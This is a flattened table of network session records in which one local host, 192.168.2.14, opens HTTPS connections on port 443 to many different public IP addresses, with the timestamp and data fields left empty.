                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15005192.168.2.145761090.235.252.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15006192.168.2.14573362.69.140.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15007192.168.2.145230814.188.154.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15008192.168.2.1454424154.209.218.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15009192.168.2.144262232.229.116.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15010192.168.2.1458100136.89.80.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15011192.168.2.1434458155.183.236.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15012192.168.2.1459348185.129.204.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15013192.168.2.145852466.116.72.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15014192.168.2.146032879.44.220.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15015192.168.2.1443860168.104.125.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15016192.168.2.144210475.212.249.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15017192.168.2.146058427.107.211.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15018192.168.2.1447272210.227.197.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15019192.168.2.1451594169.75.10.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15020192.168.2.1445614126.146.216.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15021192.168.2.1443092104.163.23.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15022192.168.2.1445800160.139.20.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15023192.168.2.1448618147.126.86.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15024192.168.2.1442800178.105.231.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15025192.168.2.1451812154.72.238.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15026192.168.2.145227863.126.186.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15027192.168.2.143983891.93.246.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15028192.168.2.1458658113.124.209.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15029192.168.2.1456940123.38.241.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15030192.168.2.145035413.255.212.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15031192.168.2.1455502170.109.93.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15032192.168.2.146062895.65.130.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15033192.168.2.144241640.103.39.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15034192.168.2.1451772193.169.48.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15035192.168.2.143317859.202.134.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15036192.168.2.144235264.197.81.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15037192.168.2.1458430186.132.21.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15038192.168.2.1434382101.252.4.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15039192.168.2.144708880.33.246.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15040192.168.2.1445854222.75.147.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15041192.168.2.1435094192.21.96.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15042192.168.2.144990485.0.187.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15043192.168.2.14506028.99.68.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15044192.168.2.1451010168.61.137.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15045192.168.2.1437988165.5.233.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15046192.168.2.1449348130.161.131.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15047192.168.2.1449436115.114.77.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15048192.168.2.144181477.50.20.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15049192.168.2.1437546183.194.221.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15050192.168.2.145400288.243.32.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15051192.168.2.143800014.92.214.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15052192.168.2.143499261.120.147.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15053192.168.2.1453612170.161.103.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15054192.168.2.14522322.236.232.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15055192.168.2.1432894208.171.98.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15056192.168.2.1459296175.107.32.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15057192.168.2.143735275.241.230.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15058192.168.2.1456244160.52.136.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15059192.168.2.1451862179.136.175.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15060192.168.2.1457478163.202.199.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15061192.168.2.1444944111.37.143.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15062192.168.2.1435778148.44.122.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15063192.168.2.144992886.196.54.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15064192.168.2.146093061.147.4.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15065192.168.2.146001619.67.70.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15066192.168.2.144157027.152.100.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15067192.168.2.145315684.223.120.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15068192.168.2.1459660222.234.228.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15069192.168.2.146098470.241.30.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15070192.168.2.145980682.47.79.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15071192.168.2.144720254.25.226.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15072192.168.2.143871295.132.23.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15073192.168.2.1455004133.246.218.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15074192.168.2.144963847.198.8.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15075192.168.2.145235663.163.244.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15076192.168.2.144152078.244.171.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15077192.168.2.1448442221.25.106.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15078192.168.2.1450156212.150.22.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15079192.168.2.144730078.102.67.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15080192.168.2.143460042.59.81.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15081192.168.2.1447428193.233.96.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15082192.168.2.145914636.1.233.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15083192.168.2.1439940192.38.124.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15084192.168.2.1459358150.71.230.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15085192.168.2.1443554216.115.162.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15086192.168.2.145738494.5.30.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15087192.168.2.143776869.229.196.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15088192.168.2.144483652.168.151.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15089192.168.2.1452240101.59.222.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15090192.168.2.143823614.154.131.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15091192.168.2.143485625.4.103.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15092192.168.2.144111479.221.34.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15093192.168.2.1451994172.223.104.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15094192.168.2.14425364.221.199.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15095192.168.2.145436466.234.122.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15096192.168.2.144914058.45.84.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15097192.168.2.1452932202.189.188.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15098192.168.2.1459642123.232.250.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15099192.168.2.1449330166.221.12.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15100192.168.2.1437906194.57.244.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15101192.168.2.144239862.244.196.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15102192.168.2.1450464136.24.17.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15103192.168.2.145198820.158.218.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15104192.168.2.144173474.16.248.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15105192.168.2.1458370115.147.24.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15106192.168.2.1437754204.120.71.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15107192.168.2.145078297.148.54.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15108192.168.2.1448906192.136.237.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15109192.168.2.1447154210.73.97.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15110192.168.2.145757036.212.237.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15111192.168.2.144264676.143.159.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15112192.168.2.145938078.105.112.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15113192.168.2.1432824218.117.196.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15114192.168.2.145959276.194.156.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15115192.168.2.1439098120.8.89.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15116192.168.2.144848634.168.195.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15117192.168.2.144825291.31.110.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15118192.168.2.143339031.213.47.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15119192.168.2.1439928165.163.97.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15120192.168.2.1459104221.209.254.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15121192.168.2.1439178101.239.191.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15122192.168.2.1455998135.200.143.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15123192.168.2.145717695.171.148.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15124192.168.2.1458484130.103.168.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15125192.168.2.1443650178.76.102.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15126192.168.2.144178280.243.96.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15127192.168.2.143969060.82.18.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15128192.168.2.145340417.106.214.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15129192.168.2.1438016123.222.95.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15130192.168.2.1441772101.182.235.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15131192.168.2.1449276218.252.88.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15132192.168.2.1445140160.158.10.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15133192.168.2.1442742141.38.30.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15134192.168.2.1458490223.5.181.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15135192.168.2.145927474.36.40.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15136192.168.2.145302884.61.59.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15137192.168.2.1442368151.181.151.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15138192.168.2.1441784141.78.99.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15139192.168.2.144030851.101.243.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15140192.168.2.1456610208.14.124.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15141192.168.2.1436456113.106.245.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15142192.168.2.14608562.239.166.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15143192.168.2.145250843.120.101.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15144192.168.2.143728217.185.218.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15145192.168.2.1443586120.121.245.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15146192.168.2.145490279.198.10.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15147192.168.2.145522067.165.156.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15148192.168.2.1450666153.213.253.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15149192.168.2.1448458126.23.31.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15150192.168.2.1446470206.84.174.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15151192.168.2.1451196185.245.176.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15152192.168.2.1438308151.169.44.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15153192.168.2.1441068219.8.140.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15154192.168.2.143954293.30.235.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15155192.168.2.144513041.180.110.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15156192.168.2.1444188176.205.187.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15157192.168.2.145117077.112.32.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15158192.168.2.1452808175.20.91.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15159192.168.2.1457920138.22.130.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15160192.168.2.1449414180.96.29.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15161192.168.2.1448650203.9.232.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15162192.168.2.145610090.207.242.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15163192.168.2.1454610197.248.169.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15164192.168.2.1434374222.126.212.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15165192.168.2.145130675.219.18.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15166192.168.2.1449246181.41.132.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15167192.168.2.1432808144.234.237.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15168192.168.2.1437846219.46.219.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15169192.168.2.1448928146.200.8.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15170192.168.2.1437624108.139.131.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15171192.168.2.1450894194.1.118.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15172192.168.2.144028450.237.151.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15173192.168.2.1441502157.243.192.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15174192.168.2.1459026108.54.83.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15175192.168.2.145451262.207.105.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15176192.168.2.143477066.104.134.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15177192.168.2.145579483.159.23.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15178192.168.2.145478243.182.243.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15179192.168.2.1436552147.130.127.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15180192.168.2.144038849.46.188.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15181192.168.2.143951231.230.150.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15182192.168.2.1460594104.204.187.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15183192.168.2.1434856121.60.14.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15184192.168.2.145190223.165.175.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15185192.168.2.1441708154.251.143.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15186192.168.2.145483492.24.8.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15187192.168.2.143654672.234.115.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15188192.168.2.1437366173.163.4.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15189192.168.2.1441382220.173.48.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15190192.168.2.1451752216.5.34.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15191192.168.2.144340269.169.159.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15192192.168.2.14443269.107.166.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15193192.168.2.1442702120.175.157.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15194192.168.2.143912679.131.91.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15195192.168.2.1453688152.16.118.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15196192.168.2.1449966143.143.62.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15197192.168.2.143445869.85.16.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15198192.168.2.144408835.219.146.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15199192.168.2.1460900180.108.227.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15200192.168.2.144021825.0.215.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15201192.168.2.1452220114.193.31.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15202192.168.2.143421263.207.88.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15203192.168.2.1460072200.101.67.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15204192.168.2.144039245.165.227.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15205192.168.2.146042075.48.161.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15206192.168.2.1438036147.166.189.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15207192.168.2.144448032.125.16.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15208192.168.2.144056644.175.203.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15209192.168.2.1442626162.68.152.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15210192.168.2.143617880.190.35.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15211192.168.2.143750823.33.135.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15212192.168.2.1447992176.96.250.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15213192.168.2.143961058.178.70.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15214192.168.2.1454900137.206.75.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15215192.168.2.145102082.39.86.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15216192.168.2.1440978108.55.141.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
